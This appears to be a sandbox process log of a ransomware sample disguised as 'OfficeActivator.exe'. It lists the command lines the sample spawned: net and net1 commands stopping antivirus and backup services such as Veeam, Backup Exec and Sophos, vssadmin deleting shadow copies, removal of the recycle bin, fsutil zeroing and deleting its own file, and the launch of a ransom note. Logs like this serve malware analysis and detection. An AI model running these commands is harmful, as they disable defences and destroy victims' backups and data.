C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooIT /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop veeam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophos /y
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooIT /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop veeam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophos /y
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OfficeActivator.exe
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
Network
Files